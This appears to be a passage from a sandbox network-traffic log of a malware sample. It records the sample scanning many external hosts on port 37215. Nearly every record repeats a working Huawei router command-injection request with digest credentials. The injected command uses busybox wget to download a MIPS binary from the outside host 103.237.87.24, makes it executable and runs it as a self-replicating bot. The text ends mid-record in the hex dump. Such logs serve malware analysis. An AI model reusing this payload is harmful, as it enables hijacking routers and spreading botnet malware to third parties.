                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  639192.168.2.133309641.167.190.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300364971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  640192.168.2.1348552172.201.15.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300376892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  641192.168.2.1345114209.204.133.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300385952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  642192.168.2.1356790197.237.135.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302874088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  643192.168.2.1333748197.248.206.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302886963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  644192.168.2.134973441.18.168.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302906990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  645192.168.2.1334048157.201.105.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302915096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  646192.168.2.1337394197.240.68.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302918911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  647192.168.2.1357030157.99.238.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302939892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  648192.168.2.1360122141.198.26.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.302939892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 